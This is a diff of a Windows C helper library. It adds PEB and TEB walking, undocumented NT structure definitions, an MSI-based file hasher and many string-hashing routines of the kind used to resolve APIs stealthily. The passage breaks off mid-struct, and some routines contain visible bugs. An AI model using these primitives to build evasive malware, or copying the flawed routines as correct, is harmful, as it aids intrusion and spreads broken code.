Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
if(nBufferLength < Module->FullDllName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
if (nBufferLength < Module->FullDllName.Length)
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, Module->FullDllName.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return Module->FullDllName.Length;
|
||||
}
|
||||
}
|
|
@ -1,22 +1,24 @@
|
|||
DWORD GetInMemoryModulePathFromProcessParametersA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetProcessPathFromProcessParametersA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->ImagePathName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->ImagePathName.Buffer, ProcessParameters->ImagePathName.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD GetInMemoryModulePathFromProcessParametersW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetProcessPathFromProcessParametersW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->ImagePathName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, ProcessParameters->ImagePathName.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return ProcessParameters->ImagePathName.Length;
|
||||
}
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PRTL_USER_PROCESS_PARAMETERS GetRtlUserProcessParameters(VOID)
|
||||
{
|
||||
return GetPeb()->ProcessParameters;
|
||||
}
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
BOOL RfGetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL GetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PKUSER_SHARED_DATA SharedData = GetKUserSharedData();
|
||||
|
||||
|
@ -11,7 +13,7 @@ BOOL RfGetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
|||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL RfGetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
BOOL GetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PKUSER_SHARED_DATA SharedData = GetKUserSharedData();
|
||||
|
||||
|
@ -22,4 +24,4 @@ BOOL RfGetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
|||
return FALSE;
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PTEB GetTeb(VOID)
|
||||
{
|
||||
#if defined(_WIN64)
|
||||
|
@ -5,4 +7,4 @@ PTEB GetTeb(VOID)
|
|||
#elif define(_WIN32)
|
||||
return (PTEB)__readfsdword(0x18);
|
||||
#endif
|
||||
}
|
||||
}
|
|
@ -0,0 +1,92 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//NOTE: PULONG must be pointed to an array of ULONG integers e.g. ULONG FileHash[4] = { 0 };
|
||||
BOOL HashFileByMsiFileHashTableW(PWCHAR Path, PULONG FileHash)
|
||||
{
|
||||
typedef struct _MSIFILEHASHINFO {
|
||||
ULONG dwFileHashInfoSize;
|
||||
ULONG dwData[4];
|
||||
} MSIFILEHASHINFO, * PMSIFILEHASHINFO;
|
||||
typedef UINT(WINAPI* MSIGETFILEHASHW)(LPCWSTR, DWORD, PMSIFILEHASHINFO);
|
||||
|
||||
MSIGETFILEHASHW MsiGetFileHashW = NULL;
|
||||
MSIFILEHASHINFO Hash = { 0 };
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(Hash);
|
||||
|
||||
hModule = LoadLibraryW(L"msi.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
MsiGetFileHashW = (MSIGETFILEHASHW)GetProcAddressW((DWORD64)hModule, L"MsiGetFileHashW");
|
||||
if (MsiGetFileHashW == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!IsPathValidW(Path))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(MSIFILEHASHINFO);
|
||||
if (MsiGetFileHashW(Path, 0, &Hash) != ERROR_SUCCESS)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < 4; dwX++)
|
||||
FileHash[dwX] = Hash.dwData[dwX];
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL HashFileByMsiFileHashTableA(PCHAR Path, PULONG FileHash)
|
||||
{
|
||||
typedef struct _MSIFILEHASHINFO {
|
||||
ULONG dwFileHashInfoSize;
|
||||
ULONG dwData[4];
|
||||
} MSIFILEHASHINFO, * PMSIFILEHASHINFO;
|
||||
typedef UINT(WINAPI* MSIGETFILEHASHA)(LPCSTR, DWORD, PMSIFILEHASHINFO);
|
||||
|
||||
MSIGETFILEHASHA MsiGetFileHashA = NULL;
|
||||
MSIFILEHASHINFO Hash = { 0 };
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6384)
|
||||
if ((sizeof(FileHash) / sizeof(ULONG)) < 4)
|
||||
return FALSE;
|
||||
#pragma warning( pop )
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(Hash);
|
||||
|
||||
hModule = LoadLibraryW(L"msi.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
MsiGetFileHashA = (MSIGETFILEHASHA)GetProcAddressW((DWORD64)hModule, L"MsiGetFileHashA");
|
||||
if (MsiGetFileHashA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!IsPathValidA(Path))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(MSIFILEHASHINFO);
|
||||
if (MsiGetFileHashA(Path, 0, &Hash) != ERROR_SUCCESS)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < 4; dwX++)
|
||||
FileHash[dwX] = Hash.dwData[dwX];
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringDjb2A(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
|
@ -18,4 +20,4 @@ DWORD HashStringDjb2W(PWCHAR String)
|
|||
Hash = ((Hash << 5) + Hash) + c;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
ULONG HashStringFowlerNollVoVariant1aA(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 0x811c9dc5;
|
||||
|
@ -22,4 +24,4 @@ ULONG HashStringFowlerNollVoVariant1aW(PWCHAR String)
|
|||
}
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringJenkinsOneAtATime32BitA(PCHAR String)
|
||||
{
|
||||
SIZE_T Index = 0;
|
||||
|
@ -36,4 +38,4 @@ UINT32 HashStringJenkinsOneAtATime32BitW(PWCHAR String)
|
|||
Hash += Hash << 15;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringLoseLoseA(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
|
@ -18,4 +20,4 @@ DWORD HashStringLoseLoseW(PWCHAR String)
|
|||
Hash += c;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringRotr32SubA(UINT32 Value, UINT Count)
|
||||
{
|
||||
DWORD Mask = (CHAR_BIT * sizeof(Value) - 1);
|
||||
|
@ -36,4 +38,4 @@ INT HashStringRotr32W(PWCHAR String)
|
|||
Value = String[Index] + HashStringRotr32SubW(Value, 7);
|
||||
|
||||
return Value;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringSdbmA(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
|
@ -18,4 +20,4 @@ DWORD HashStringSdbmW(PWCHAR String)
|
|||
Hash = c + (Hash << 6) + (Hash << 16) - Hash;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringSuperFastHashA(PCHAR String)
|
||||
{
|
||||
INT Length = (INT)StringLengthA(String);
|
||||
|
@ -108,4 +110,4 @@ UINT32 HashStringSuperFastHashW(PWCHAR String)
|
|||
Hash += Hash >> 6;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
INT HashStringUnknownGenericHash1A(PCHAR String)
|
||||
{
|
||||
PCHAR Pointer;
|
||||
|
@ -36,4 +38,4 @@ INT HashStringUnknownGenericHash1W(PWCHAR String)
|
|||
}
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,490 @@
|
|||
#pragma once
|
||||
#include <Windows.h>
|
||||
|
||||
#define PROCESSOR_FEATURE_MAX 64
|
||||
|
||||
#define InitializeObjectAttributes(p, n, a, r, s) \
|
||||
{ \
|
||||
(p)->Length = sizeof(OBJECT_ATTRIBUTES); \
|
||||
(p)->RootDirectory = r; \
|
||||
(p)->Attributes = a; \
|
||||
(p)->ObjectName = n; \
|
||||
(p)->SecurityDescriptor = s; \
|
||||
(p)->SecurityQualityOfService = NULL; \
|
||||
}
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PWSTR Buffer;
|
||||
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;
|
||||
|
||||
typedef struct _LDR_MODULE {
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
PVOID BaseAddress;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
SHORT LoadCount;
|
||||
SHORT TlsIndex;
|
||||
LIST_ENTRY HashTableEntry;
|
||||
ULONG TimeDateStamp;
|
||||
} LDR_MODULE, * PLDR_MODULE;
|
||||
|
||||
typedef struct _PEB_LDR_DATA {
|
||||
ULONG Length;
|
||||
ULONG Initialized;
|
||||
PVOID SsHandle;
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
||||
|
||||
typedef struct _CURDIR {
|
||||
UNICODE_STRING DosPath;
|
||||
PVOID Handle;
|
||||
}CURDIR, * PCURDIR;
|
||||
|
||||
typedef struct _STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PCHAR Buffer;
|
||||
} ANSI_STRING, * PANSI_STRING;
|
||||
|
||||
typedef struct _RTL_DRIVE_LETTER_CURDIR {
|
||||
WORD Flags;
|
||||
WORD Length;
|
||||
ULONG TimeStamp;
|
||||
ANSI_STRING DosPath;
|
||||
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
|
||||
|
||||
typedef struct _RTL_USER_PROCESS_PARAMETERS {
|
||||
ULONG MaximumLength;
|
||||
ULONG Length;
|
||||
ULONG Flags;
|
||||
ULONG DebugFlags;
|
||||
PVOID ConsoleHandle;
|
||||
ULONG ConsoleFlags;
|
||||
PVOID StandardInput;
|
||||
PVOID StandardOutput;
|
||||
PVOID StandardError;
|
||||
CURDIR CurrentDirectory;
|
||||
UNICODE_STRING DllPath;
|
||||
UNICODE_STRING ImagePathName;
|
||||
UNICODE_STRING CommandLine;
|
||||
PVOID Environment;
|
||||
ULONG StartingX;
|
||||
ULONG StartingY;
|
||||
ULONG CountX;
|
||||
ULONG CountY;
|
||||
ULONG CountCharsX;
|
||||
ULONG CountCharsY;
|
||||
ULONG FillAttribute;
|
||||
ULONG WindowFlags;
|
||||
ULONG ShowWindowFlags;
|
||||
UNICODE_STRING WindowTitle;
|
||||
UNICODE_STRING DesktopInfo;
|
||||
UNICODE_STRING ShellInfo;
|
||||
UNICODE_STRING RuntimeData;
|
||||
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
|
||||
ULONG EnvironmentSize;
|
||||
}RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
|
||||
|
||||
typedef struct _PEB {
|
||||
BOOLEAN InheritedAddressSpace;
|
||||
BOOLEAN ReadImageFileExecOptions;
|
||||
BOOLEAN BeingDebugged;
|
||||
BOOLEAN Spare;
|
||||
HANDLE Mutant;
|
||||
PVOID ImageBase;
|
||||
PPEB_LDR_DATA LoaderData;
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
|
||||
PVOID SubSystemData;
|
||||
PVOID ProcessHeap;
|
||||
PVOID FastPebLock;
|
||||
PVOID FastPebLockRoutine;
|
||||
PVOID FastPebUnlockRoutine;
|
||||
ULONG EnvironmentUpdateCount;
|
||||
PVOID* KernelCallbackTable;
|
||||
PVOID EventLogSection;
|
||||
PVOID EventLog;
|
||||
PVOID FreeList;
|
||||
ULONG TlsExpansionCounter;
|
||||
PVOID TlsBitmap;
|
||||
ULONG TlsBitmapBits[0x2];
|
||||
PVOID ReadOnlySharedMemoryBase;
|
||||
PVOID ReadOnlySharedMemoryHeap;
|
||||
PVOID* ReadOnlyStaticServerData;
|
||||
PVOID AnsiCodePageData;
|
||||
PVOID OemCodePageData;
|
||||
PVOID UnicodeCaseTableData;
|
||||
ULONG NumberOfProcessors;
|
||||
ULONG NtGlobalFlag;
|
||||
BYTE Spare2[0x4];
|
||||
LARGE_INTEGER CriticalSectionTimeout;
|
||||
ULONG HeapSegmentReserve;
|
||||
ULONG HeapSegmentCommit;
|
||||
ULONG HeapDeCommitTotalFreeThreshold;
|
||||
ULONG HeapDeCommitFreeBlockThreshold;
|
||||
ULONG NumberOfHeaps;
|
||||
ULONG MaximumNumberOfHeaps;
|
||||
PVOID** ProcessHeaps;
|
||||
PVOID GdiSharedHandleTable;
|
||||
PVOID ProcessStarterHelper;
|
||||
PVOID GdiDCAttributeList;
|
||||
PVOID LoaderLock;
|
||||
ULONG OSMajorVersion;
|
||||
ULONG OSMinorVersion;
|
||||
ULONG OSBuildNumber;
|
||||
ULONG OSPlatformId;
|
||||
ULONG ImageSubSystem;
|
||||
ULONG ImageSubSystemMajorVersion;
|
||||
ULONG ImageSubSystemMinorVersion;
|
||||
ULONG GdiHandleBuffer[0x22];
|
||||
ULONG PostProcessInitRoutine;
|
||||
ULONG TlsExpansionBitmap;
|
||||
BYTE TlsExpansionBitmapBits[0x80];
|
||||
ULONG SessionId;
|
||||
} PEB, * PPEB;
|
||||
|
||||
typedef struct __CLIENT_ID {
|
||||
HANDLE UniqueProcess;
|
||||
HANDLE UniqueThread;
|
||||
}CLIENT_ID, * PCLIENT_ID;
|
||||
|
||||
typedef PVOID PACTIVATION_CONTEXT;
|
||||
|
||||
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
|
||||
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
|
||||
PACTIVATION_CONTEXT ActivationContext;
|
||||
ULONG Flags;
|
||||
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
|
||||
|
||||
typedef struct _ACTIVATION_CONTEXT_STACK {
|
||||
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
|
||||
LIST_ENTRY FrameListCache;
|
||||
ULONG Flags;
|
||||
ULONG NextCookieSequenceNumber;
|
||||
ULONG StackId;
|
||||
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
|
||||
|
||||
typedef struct _GDI_TEB_BATCH {
|
||||
ULONG Offset;
|
||||
ULONG HDC;
|
||||
ULONG Buffer[310];
|
||||
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
|
||||
ULONG Flags;
|
||||
PCHAR FrameName;
|
||||
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME {
|
||||
ULONG Flags;
|
||||
struct _TEB_ACTIVE_FRAME* Previous;
|
||||
PTEB_ACTIVE_FRAME_CONTEXT Context;
|
||||
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
|
||||
|
||||
typedef struct _TEB
|
||||
{
|
||||
NT_TIB NtTib;
|
||||
PVOID EnvironmentPointer;
|
||||
CLIENT_ID ClientId;
|
||||
PVOID ActiveRpcHandle;
|
||||
PVOID ThreadLocalStoragePointer;
|
||||
PPEB ProcessEnvironmentBlock;
|
||||
ULONG LastErrorValue;
|
||||
ULONG CountOfOwnedCriticalSections;
|
||||
PVOID CsrClientThread;
|
||||
PVOID Win32ThreadInfo;
|
||||
ULONG User32Reserved[26];
|
||||
ULONG UserReserved[5];
|
||||
PVOID WOW32Reserved;
|
||||
LCID CurrentLocale;
|
||||
ULONG FpSoftwareStatusRegister;
|
||||
PVOID SystemReserved1[54];
|
||||
LONG ExceptionCode;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
|
||||
ULONG TxFsContext;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
|
||||
#else
|
||||
ACTIVATION_CONTEXT_STACK ActivationContextStack;
|
||||
UCHAR SpareBytes1[24];
|
||||
#endif
|
||||
GDI_TEB_BATCH GdiTebBatch;
|
||||
CLIENT_ID RealClientId;
|
||||
PVOID GdiCachedProcessHandle;
|
||||
ULONG GdiClientPID;
|
||||
ULONG GdiClientTID;
|
||||
PVOID GdiThreadLocalInfo;
|
||||
PSIZE_T Win32ClientInfo[62];
|
||||
PVOID glDispatchTable[233];
|
||||
PSIZE_T glReserved1[29];
|
||||
PVOID glReserved2;
|
||||
PVOID glSectionInfo;
|
||||
PVOID glSection;
|
||||
PVOID glTable;
|
||||
PVOID glCurrentRC;
|
||||
PVOID glContext;
|
||||
NTSTATUS LastStatusValue;
|
||||
UNICODE_STRING StaticUnicodeString;
|
||||
WCHAR StaticUnicodeBuffer[261];
|
||||
PVOID DeallocationStack;
|
||||
PVOID TlsSlots[64];
|
||||
LIST_ENTRY TlsLinks;
|
||||
PVOID Vdm;
|
||||
PVOID ReservedForNtRpc;
|
||||
PVOID DbgSsReserved[2];
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG HardErrorMode;
|
||||
#else
|
||||
ULONG HardErrorsAreDisabled;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
|
||||
GUID ActivityId;
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
PVOID EtwTraceData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID Instrumentation[14];
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
#else
|
||||
PVOID Instrumentation[16];
|
||||
#endif
|
||||
PVOID WinSockData;
|
||||
ULONG GdiBatchCount;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
BOOLEAN SpareBool0;
|
||||
BOOLEAN SpareBool1;
|
||||
BOOLEAN SpareBool2;
|
||||
#else
|
||||
BOOLEAN InDbgPrint;
|
||||
BOOLEAN FreeStackOnTermination;
|
||||
BOOLEAN HasFiberData;
|
||||
#endif
|
||||
UCHAR IdealProcessor;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG GuaranteedStackBytes;
|
||||
#else
|
||||
ULONG Spare3;
|
||||
#endif
|
||||
PVOID ReservedForPerf;
|
||||
PVOID ReservedForOle;
|
||||
ULONG WaitingOnLoaderLock;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID SavedPriorityState;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR ThreadPoolData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG_PTR SparePointer1;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR SoftPatchPtr2;
|
||||
#else
|
||||
Wx86ThreadState Wx86Thread;
|
||||
#endif
|
||||
PVOID* TlsExpansionSlots;
|
||||
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
|
||||
PVOID DeallocationBStore;
|
||||
PVOID BStoreLimit;
|
||||
#endif
|
||||
ULONG ImpersonationLocale;
|
||||
ULONG IsImpersonating;
|
||||
PVOID NlsCache;
|
||||
PVOID pShimData;
|
||||
ULONG HeapVirtualAffinity;
|
||||
HANDLE CurrentTransactionHandle;
|
||||
PTEB_ACTIVE_FRAME ActiveFrame;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID FlsData;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID PreferredLangauges;
|
||||
PVOID UserPrefLanguages;
|
||||
PVOID MergedPrefLanguages;
|
||||
ULONG MuiImpersonation;
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT SpareCrossTebFlags : 16;
|
||||
};
|
||||
USHORT CrossTebFlags;
|
||||
};
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT DbgSafeThunkCall : 1;
|
||||
USHORT DbgInDebugPrint : 1;
|
||||
USHORT DbgHasFiberData : 1;
|
||||
USHORT DbgSkipThreadAttach : 1;
|
||||
USHORT DbgWerInShipAssertCode : 1;
|
||||
USHORT DbgIssuedInitialBp : 1;
|
||||
USHORT DbgClonedThread : 1;
|
||||
USHORT SpareSameTebBits : 9;
|
||||
};
|
||||
USHORT SameTebFlags;
|
||||
};
|
||||
PVOID TxnScopeEntercallback;
|
||||
PVOID TxnScopeExitCAllback;
|
||||
PVOID TxnScopeContext;
|
||||
ULONG LockCount;
|
||||
ULONG ProcessRundown;
|
||||
ULONG64 LastSwitchTime;
|
||||
ULONG64 TotalSwitchOutTime;
|
||||
LARGE_INTEGER WaitReasonBitMap;
|
||||
#else
|
||||
BOOLEAN SafeThunkCall;
|
||||
BOOLEAN BooleanSpare[3];
|
||||
#endif
|
||||
} TEB, * PTEB;
|
||||
|
||||
typedef struct _KSYSTEM_TIME
|
||||
{
|
||||
ULONG LowPart;
|
||||
LONG High1Time;
|
||||
LONG High2Time;
|
||||
} KSYSTEM_TIME, * PKSYSTEM_TIME;
|
||||
|
||||
typedef enum _NT_PRODUCT_TYPE
|
||||
{
|
||||
NtProductWinNt = 1,
|
||||
NtProductLanManNt = 2,
|
||||
NtProductServer = 3
|
||||
} NT_PRODUCT_TYPE;
|
||||
|
||||
typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE
|
||||
{
|
||||
StandardDesign = 0,
|
||||
NEC98x86 = 1,
|
||||
EndAlternatives = 2
|
||||
} ALTERNATIVE_ARCHITECTURE_TYPE;
|
||||
|
||||
typedef struct _KUSER_SHARED_DATA {
|
||||
ULONG TickCountLowDeprecated;
|
||||
ULONG TickCountMultiplier;
|
||||
KSYSTEM_TIME InterruptTime;
|
||||
KSYSTEM_TIME SystemTime;
|
||||
KSYSTEM_TIME TimeZoneBias;
|
||||
USHORT ImageNumberLow;
|
||||
USHORT ImageNumberHigh;
|
||||
WCHAR NtSystemRoot[260];
|
||||
ULONG MaxStackTraceDepth;
|
||||
ULONG CryptoExponent;
|
||||
ULONG TimeZoneId;
|
||||
ULONG LargePageMinimum;
|
||||
ULONG AitSamplingValue;
|
||||
ULONG AppCompatFlag;
|
||||
ULONGLONG RNGSeedVersion;
|
||||
ULONG GlobalValidationRunlevel;
|
||||
LONG TimeZoneBiasStamp;
|
||||
ULONG NtBuildNumber;
|
||||
NT_PRODUCT_TYPE NtProductType;
|
||||
BOOLEAN ProductTypeIsValid;
|
||||
BOOLEAN Reserved0[1];
|
||||
USHORT NativeProcessorArchitecture;
|
||||
ULONG NtMajorVersion;
|
||||
ULONG NtMinorVersion;
|
||||
BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];
|
||||
ULONG Reserved1;
|
||||
ULONG Reserved3;
|
||||
ULONG TimeSlip;
|
||||
ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
|
||||
ULONG BootId;
|
||||
LARGE_INTEGER SystemExpirationDate;
|
||||
ULONG SuiteMask;
|
||||
BOOLEAN KdDebuggerEnabled;
|
||||
union {
|
||||
UCHAR MitigationPolicies;
|
||||
struct {
|
||||
UCHAR NXSupportPolicy : 2;
|
||||
UCHAR SEHValidationPolicy : 2;
|
||||
UCHAR CurDirDevicesSkippedForDlls : 2;
|
||||
UCHAR Reserved : 2;
|
||||
};
|
||||
};
|
||||
USHORT CyclesPerYield;
|
||||
ULONG ActiveConsoleId;
|
||||
ULONG DismountCount;
|
||||
ULONG ComPlusPackage;
|
||||
ULONG LastSystemRITEventTickCount;
|
||||
ULONG NumberOfPhysicalPages;
|
||||
BOOLEAN SafeBootMode;
|
||||
UCHAR VirtualizationFlags;
|
||||
UCHAR Reserved12[2];
|
||||
union {
|
||||
ULONG SharedDataFlags;
|
||||
struct {
|
||||
ULONG DbgErrorPortPresent : 1;
|
||||
ULONG DbgElevationEnabled : 1;
|
||||
ULONG DbgVirtEnabled : 1;
|
||||
ULONG DbgInstallerDetectEnabled : 1;
|
||||
ULONG DbgLkgEnabled : 1;
|
||||
ULONG DbgDynProcessorEnabled : 1;
|
||||
ULONG DbgConsoleBrokerEnabled : 1;
|
||||
ULONG DbgSecureBootEnabled : 1;
|
||||
ULONG DbgMultiSessionSku : 1;
|
||||
ULONG DbgMultiUsersInSessionSku : 1;
|
||||
ULONG DbgStateSeparationEnabled : 1;
|
||||
ULONG SpareBits : 21;
|
||||
} DUMMYSTRUCTNAME2;
|
||||
} DUMMYUNIONNAME2;
|
||||
ULONG DataFlagsPad[1];
|
||||
ULONGLONG TestRetInstruction;
|
||||
LONGLONG QpcFrequency;
|
||||
ULONG SystemCall;
|
||||
ULONG Reserved2;
|
||||
ULONGLONG SystemCallPad[2];
|
||||
union {
|
||||
KSYSTEM_TIME TickCount;
|
||||
ULONG64 TickCountQuad;
|
||||
struct {
|
||||
ULONG ReservedTickCountOverlay[3];
|
||||
ULONG TickCountPad[1];
|
||||
} DUMMYSTRUCTNAME;
|
||||
} DUMMYUNIONNAME3;
|
||||
ULONG Cookie;
|
||||
ULONG CookiePad[1];
|
||||
LONGLONG ConsoleSessionForegroundProcessId;
|
||||
ULONGLONG TimeUpdateLock;
|
||||
ULONGLONG BaselineSystemTimeQpc;
|
||||
ULONGLONG BaselineInterruptTimeQpc;
|
||||
ULONGLONG QpcSystemTimeIncrement;
|
||||
ULONGLONG QpcInterruptTimeIncrement;
|
||||
UCHAR QpcSystemTimeIncrementShift;
|
||||
UCHAR QpcInterruptTimeIncrementShift;
|
||||
USHORT UnparkedProcessorCount;
|
||||
ULONG EnclaveFeatureMask[4];
|
||||
ULONG TelemetryCoverageRound;
|
||||
USHORT UserModeGlobalLogger[16];
|
||||
ULONG ImageFileExecutionOptions;
|
||||
ULONG LangGenerationCount;
|
||||
ULONGLONG Reserved4;
|
||||
ULONGLONG InterruptTimeBias;
|
||||
ULONGLONG QpcBias;
|
||||
ULONG ActiveProcessorCount;
|
||||
UCHAR ActiveGroupCount;
|
||||
UCHAR Reserved9;
|
||||
union {
|
||||
